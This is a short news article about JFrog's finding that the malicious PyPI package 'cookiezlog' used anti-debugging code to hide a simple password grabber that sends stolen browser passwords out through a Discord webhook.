Python malware uses a sneaky new technique
Threat actors that create Python malware are getting better and their payloads are harder to detect, researchers have claimed.
While analyzing a recently discovered malicious payload, JFrog reported how the attackers used a new technique – anti-debugging code – to make it harder for researchers to analyze the payloads and understand the logic behind the code.
In addition to “normal” obfuscation tools and techniques, the hackers behind the “cookiezlog” package used anti-debugging code to thwart dynamic analysis tools.
First time
According to JFrog, this is the first time such a method has been discovered in a PyPI malware.
“Most PyPI malware today tries to avoid static detection using various techniques, ranging from primitive variable mangling to sophisticated code flattening and steganography techniques,” the researchers explain in a blog entry (opens in new tab).
“The use of these techniques makes the package extremely suspicious, but it prevents inexperienced researchers from understanding exactly how the malware works using static analysis tools. However, any dynamic analysis tool, such as a malware sandbox, quickly removes the static protective layers of the malware and reveals the underlying logic.”
The hackers’ efforts seem futile as the researchers at JFrog managed to bypass the workarounds and peer directly into the payload. After analysis, the researchers described the payload as “disappointingly simple” compared to the effort that went into keeping it hidden. However, it is still malicious as cookiezlog is a password grabber capable of stealing “autocomplete” passwords stored in data caches of popular browsers.
The information gathered is then sent to the attackers via a Discord hook that acts as a command and control server.
Unfortunately, JFrog has not disclosed the name of the group behind the malware, nor the proliferation techniques used to land the password grabber on victims’ endpoints. Regardless, there is more frequent news about PyPI malware, suggesting that Python developers have become a prime target.
https://www.techradar.com/news/python-malware-is-using-a-devious-new-technique Python malware uses a sneaky new technique
